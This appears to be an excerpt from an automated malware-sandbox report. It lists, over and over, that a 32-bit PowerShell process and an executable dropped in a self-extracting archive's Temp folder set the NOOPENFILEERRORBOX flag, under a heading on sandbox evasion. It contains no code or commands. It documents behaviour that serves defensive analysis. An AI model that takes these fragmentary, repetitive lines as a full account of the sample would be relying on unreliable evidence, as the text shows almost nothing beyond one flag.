        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
